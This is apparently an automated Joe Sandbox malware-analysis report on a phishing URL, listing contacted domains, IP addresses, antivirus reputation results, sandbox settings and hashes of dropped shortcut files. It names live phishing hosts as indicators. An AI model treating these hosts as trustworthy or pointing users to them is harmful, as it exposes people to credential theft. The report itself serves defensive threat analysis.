    https://5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com/RixLwBRTZMAWsZcncGMFCwLdMTXJRJHZLUMYMZVRHZXYMGITWHJMARBESMLCNUW0%Avira URL Cloudsafe
    https://52kz793.afratradingagency.com/main.js0%Avira URL Cloudsafe
    https://content-googleapis-test.sandbox.google.com0%Avira URL Cloudsafe
    https://content-googleapis-staging.sandbox.google.com0%Avira URL Cloudsafe
    https://32.ergeane.ru/favicon.ico100%Avira URL Cloudphishing
    NameIPActiveMaliciousAntivirus DetectionReputation
    docs.google.com
    142.250.181.110
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        plus.l.google.com
        142.250.181.46
        truefalse
          high
          support.google.com
          172.217.19.206
          truefalse
            high
            code.jquery.com
            151.101.66.137
            truefalse
              high
              5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com
              104.21.112.1
              truefalse
                high
                www3.l.google.com
                172.217.19.206
                truefalse
                  high
                  play.google.com
                  142.250.181.110
                  truefalse
                    high
                    challenges.cloudflare.com
                    104.18.95.41
                    truefalse
                      high
                      cdn.prod.website-files.com
                      104.18.161.117
                      truefalse
                        high
                        52kz793.afratradingagency.com
                        192.185.195.214
                        truefalse
                          high
                          www.google.com
                          142.250.181.132
                          truefalse
                            high
                            32.ergeane.ru
                            104.21.32.225
                            truefalse
                              high
                              googlehosted.l.googleusercontent.com
                              142.250.181.65
                              truefalse
                                high
                                lh3.googleusercontent.com
                                unknown
                                unknownfalse
                                  high
                                  accounts.youtube.com
                                  unknown
                                  unknownfalse
                                    high
                                    apis.google.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f418ee08bfa41f8/1734550133132/ce2a6eec6335e51e65b8256666d1557c63e830bea0bac4bd859dd894be18f968/HOSmDxED5TPSN8Hfalse
                                        high
                                        https://www.google.com/generate_204false
                                          high
                                          https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                            high
                                            https://52kz793.afratradingagency.com/main.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://docs.google.com/false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1242342259:1734549062:rcwFK2sENi_jYVVwqfENsIj5TcEuZRVTF9ti3g2cwpM/8f418ee08bfa41f8/ER6.V2eBLIVRB_OW6H_BiuyJ2C354c25ECoBrxarNns-1734550128-1.1.1.1-NhDFsj2AD.mSwk7I0MyJdLVbjObcDmRxShSF.ZpfO1bjh_f_6Z3TxwkCwi32MRnofalse
                                                high
                                                https://5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.com/RixLwBRTZMAWsZcncGMFCwLdMTXJRJHZLUMYMZVRHZXYMGITWHJMARBESMLCNUWfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://52kz793.afratradingagency.com/favicon.icofalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/2086485229:1734549043:TPqdoFXSqnBTzlfdVp_C1hOSpTqfObAmvJDumlRiigI/8f418d689add32ca/sCDrsV9LIaSFpes0IKITElad6ICUbYIMVUygOsJtH.I-1734550068-1.1.1.1-QtOUJfLZCQbLtTQ18ode0.v6uncVl07WirXxFCCvRnoBWYkvA.1m7PAgDI5j43Qufalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f418d689add32ca/1734550072811/ws77LC-Zvt6wd3ofalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f418d689add32ca&lang=autofalse
                                                      high
                                                      https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                        high
                                                        https://a.nel.cloudflare.com/report/v4?s=r6A0V5eJHrcabc1RHlQm3W1GJ8RrJJlBC6i0oCJwyMEtdVqAHIVSL%2FSxVwAovMVg95dSgMqzWiz%2FnFP%2FfxqizR%2FDTfMeqN%2FG0geMLltpd6Yh77BM%2Bce3TJh%2Fqj%2FYRA%3D%3Dfalse
                                                          high
                                                          https://32.ergeane.ru/favicon.icofalse
                                                          • Avira URL Cloud: phishing
                                                          unknown
                                                          https://www.google.com/favicon.icofalse
                                                            high
                                                            https://cdn.prod.website-files.com/5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webpfalse
                                                              high
                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f418d689add32ca/1734550072814/43f2e9d347adfa999698c3de808376dcbbeb8fdd81c9d20ed7f152aa5925d797/m_5diggWAVh3NiIfalse
                                                                high
                                                                https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_1false
                                                                  high
                                                                  https://52kz793.afratradingagency.com/false
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f418ee08bfa41f8/1734550133133/5r7qG9mw9MML0Vhfalse
                                                                      high
                                                                      https://32.ergeane.ru/yNriUGk0/true
                                                                        unknown
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                          high
                                                                          https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                                                                            high
                                                                            https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0false
                                                                              high
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://stats.g.doubleclick.net/g/collectchromecache_166.1.dr, chromecache_139.1.drfalse
                                                                                high
                                                                                https://feedback.googleusercontent.com/resources/annotator.csschromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                  high
                                                                                  http://www.broofa.comchromecache_146.1.dr, chromecache_128.1.drfalse
                                                                                    high
                                                                                    https://apis.google.com/js/client.jschromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                      high
                                                                                      https://feedback2-test.corp.googleusercontent.com/tools/feedback/%chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                        high
                                                                                        https://support.google.com/chrome/answer/6130773?hl=en&amp;co=GENIE.Platform%3DiOS6130773.htm.crdownload.0.drfalse
                                                                                          high
                                                                                          https://support.google.com/google-ads/workflow/142825346130773.htm.crdownload.0.drfalse
                                                                                            high
                                                                                            https://support.google.com6130773.htm.crdownload.0.drfalse
                                                                                              high
                                                                                              https://www.youtube.com/embed/6130773.htm.crdownload.0.drfalse
                                                                                                high
                                                                                                http://localhost.proxy.googlers.com/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                  high
                                                                                                  https://www.google.com/accounts/TOS6130773.htm.crdownload.0.drfalse
                                                                                                    high
                                                                                                    https://policies.google.com/terms?hl=6130773.htm.crdownload.0.drfalse
                                                                                                      high
                                                                                                      https://stagingqual-feedback-pa-googleapis.sandbox.google.comchromecache_145.1.drfalse
                                                                                                        high
                                                                                                        https://play.google.com/work/enroll?identifier=chromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                          high
                                                                                                          https://policies.google.com/terms/service-specificchromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                            high
                                                                                                            https://g.co/recoverchromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                              high
                                                                                                              https://support.google.com/websearch/answer/4358949?hl=ko&ref_topic=3285072chromecache_137.1.drfalse
                                                                                                                high
                                                                                                                https://ampcid.google.com/v1/publisher:getClientIdchromecache_127.1.dr, chromecache_116.1.drfalse
                                                                                                                  high
                                                                                                                  https://help.youtube.com/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                    high
                                                                                                                    https://policies.google.com/technologies/cookieschromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                      high
                                                                                                                      https://policies.google.com/termschromecache_104.1.dr, 6130773.htm.crdownload.0.dr, chromecache_137.1.drfalse
                                                                                                                        high
                                                                                                                        https://asx-frontend-staging.corp.google.com/tools/feedback/chromecache_145.1.drfalse
                                                                                                                          high
                                                                                                                          https://www.google.comchromecache_139.1.drfalse
                                                                                                                            high
                                                                                                                            https://www.youtube.com/t/terms?chromeless=1&hl=chromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                              high
                                                                                                                              https://support.google.com/chrome/answer/6130773?hl=en&amp;co=GENIE.Platform%3DAndroid6130773.htm.crdownload.0.drfalse
                                                                                                                                high
                                                                                                                                https://policies.google.com/terms/locationchromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://content-googleapis-test.sandbox.google.com6130773.htm.crdownload.0.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://asx-frontend-autopush.corp.google.co.uk/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://stats.g.doubleclick.net/j/collectchromecache_116.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://myaccount.google.com/privacypolicy?hl=6130773.htm.crdownload.0.drfalse
                                                                                                                                        high
                                                                                                                                        http://code.jquery.com/jquery-3.3.1.min.jschromecache_164.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/tools/feedbackchromecache_145.1.dr, 6130773.htm.crdownload.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://supporttagging-autopush.sandbox.google.com/embed/tagging/install6130773.htm.crdownload.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://youtube.com/t/terms?gl=chromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://sandbox.google.com/inapp/%chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.google.com/intl/chromecache_137.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.google.com/chrome/?p=betadesktop6130773.htm.crdownload.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://apis.google.com/js/api.jschromecache_138.1.dr, chromecache_107.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://support.google.com/communities/answer/74242496130773.htm.crdownload.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://schema.org6130773.htm.crdownload.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://feedback2-test.corp.google.com/tools/feedback/%chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://cct.google/taggy/agent.jschromecache_166.1.dr, chromecache_140.1.dr, chromecache_139.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://gmpg.org/xfn/11chromecache_164.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://asx-frontend-autopush.corp.google.de/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://support.google.com/communities/answer/74251946130773.htm.crdownload.0.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://asx-help-frontend-autopush.corp.youtube.com/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://play.google.com/log?format=json&hasfast=truechromecache_137.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://asx-frontend-autopush.corp.google.com/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://feedback.googleusercontent.com/resources/render_frame2.htmlchromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://sandbox.google.com/tools/feedback/%chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://www.google.%/ads/ga-audienceschromecache_127.1.dr, chromecache_116.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://content-googleapis-staging.sandbox.google.com6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://localhost.corp.google.com/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://support.google.com/chrome/?p=beta_forum_hc6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://policies.google.com/privacychromecache_137.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://asx-frontend-staging.corp.google.com/inapp/chromecache_145.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://fonts.google.com/license/googlerestrictedchromecache_134.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://clients6.google.com6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://play.google/intl/chromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://localhost.corp.google.com/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://families.google.com/intl/chromecache_137.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://support.google.com/embed/tagging/install6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://policies.google.com/technologies/location-datachromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://play.google.com6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://support.google.com/inapp/%chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://asx-help-frontend-autopush.corp.youtube.com/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.google.com/recaptcha/api.js?trustedtypes=true&onload=6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://support.google.com/chromecache_145.1.dr, 6130773.htm.crdownload.0.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://scone-pa.clients6.google.comchromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://support.google.com/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://asx-frontend-autopush.corp.google.co.uk/inapp/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://apis.google.comchromecache_146.1.dr, chromecache_128.1.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://asx-frontend-autopush.corp.google.com/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://asx-frontend-autopush.corp.youtube.com/tools/feedback/chromecache_135.1.dr, chromecache_145.1.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://support.google.com/accounts?p=new-si-uichromecache_104.1.dr, chromecache_137.1.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  104.21.32.225
                                                                                                                                                                                                                                  32.ergeane.ruUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  172.217.19.228
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  104.18.161.117
                                                                                                                                                                                                                                  cdn.prod.website-files.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  142.250.181.132
                                                                                                                                                                                                                                  www.google.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  142.250.181.110
                                                                                                                                                                                                                                  docs.google.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  151.101.130.137
                                                                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                  104.21.112.1
                                                                                                                                                                                                                                  5q2jou2p20kkfrkwqmtalk1yiquzktusmfn6dlbrrnniurmuvfw3.diblethe.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  151.101.66.137
                                                                                                                                                                                                                                  code.jquery.comUnited States
                                                                                                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                                                                                                  142.250.181.46
                                                                                                                                                                                                                                  plus.l.google.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  35.190.80.1
                                                                                                                                                                                                                                  a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  192.185.195.214
                                                                                                                                                                                                                                  52kz793.afratradingagency.comUnited States
                                                                                                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                  104.18.95.41
                                                                                                                                                                                                                                  challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  239.255.255.250
                                                                                                                                                                                                                                  unknownReserved
                                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.16
                                                                                                                                                                                                                                  192.168.2.5
                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1577854
                                                                                                                                                                                                                                  Start date and time:2024-12-18 20:27:06 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 4m 21s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                  Sample URL:https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:18
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal72.phis.win@32/123@51/15
                                                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172, 172.217.21.35, 172.217.17.78, 64.233.162.84, 142.250.181.142, 172.217.17.46, 172.217.19.10, 172.217.17.74, 142.250.181.42, 142.250.181.10, 172.217.19.202, 216.58.208.234, 172.217.21.42, 142.250.181.138, 172.217.19.234, 142.250.181.74, 172.217.17.42, 142.250.181.106, 172.217.17.35, 172.217.17.67, 142.250.181.67, 172.217.19.170, 172.217.19.206, 172.217.19.238, 216.58.208.232, 142.250.181.99, 142.250.181.136, 23.218.208.109, 20.12.23.50
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, www.google-analytics.com
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: https://52kz793.afratradingagency.com/
                                                                                                                                                                                                                                  No simulations
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:27:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2673
                                                                                                                                                                                                                                  Entropy (8bit):3.986413443912682
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:8ZdPTnzNwHBidAKZdA1FehwiZUklqehekJy+3:8D/N2/Yy
                                                                                                                                                                                                                                  MD5:801150DD2AF885E785E658068274F186
                                                                                                                                                                                                                                  SHA1:105BC360CDF5236BEE4FDADBC182A0B80BBC9352
                                                                                                                                                                                                                                  SHA-256:523F61664279D84245F28216B0709932320F14F6F67D4B47BF96D639C597CE85
                                                                                                                                                                                                                                  SHA-512:1D91426E1C6C0C98A091900A68A6CC572CE7F392889AECE6631B16112B72AAB01B047FAA0C227562CBEF82F823DDE3F70A69B7D66475D98528EFC15FFD4B6072
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,........Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yk.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:27:41 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2675
                                                                                                                                                                                                                                  Entropy (8bit):4.0033502016491305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:8IdPTnzNwHBidAKZdA1seh/iZUkAQkqehvkJy+2:8w/NQ9Q0Yy
                                                                                                                                                                                                                                  MD5:7DDF51987C049C99AE6B9AD9A92B811C
                                                                                                                                                                                                                                  SHA1:3E5D0D3123339AE72B385F852F601ED3A5D9CF82
                                                                                                                                                                                                                                  SHA-256:CB34FF4583EB400F77A20809A265053FEE066BA47506812E665C84B9DEC50C1D
                                                                                                                                                                                                                                  SHA-512:1163F69C0E8A756F1A0D70141E499AC965A4887DD6C74C823C457C51646733935B904344A997610254180B40F4BCE00EC5A4644A5689179712BF2339E52214FA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,........Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Yk.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yt.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yt.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yt............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yu............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2689
                                                                                                                                                                                                                                  Entropy (8bit):4.007820190135693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:8zdPTnzAHBidAKZdA14meh7sFiZUkmgqeh7s9kJy+BX:8N/MnjYy
                                                                                                                                                                                                                                  MD5:DDDF6DD42E677643242962D771419C1E
                                                                                                                                                                                                                                  SHA1:B5FA2BA02606F901E5763DBE0FAC5894BDE65D3A
                                                                                                                                                                                                                                  SHA-256:94361B629C5D4C403AA4DA23AF1AF8CA07CD1137B4C2F17BE9985C7FA581C463
                                                                                                                                                                                                                                  SHA-512:BF77EA9B08E52514E067FEACEDB4209D3965A2A00BC264B7BBAE01A922B57FD5F8C99EA2811BF9F42054BCED9A725A1DC3BEF3982655D00F3D9C48F84732FCE1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
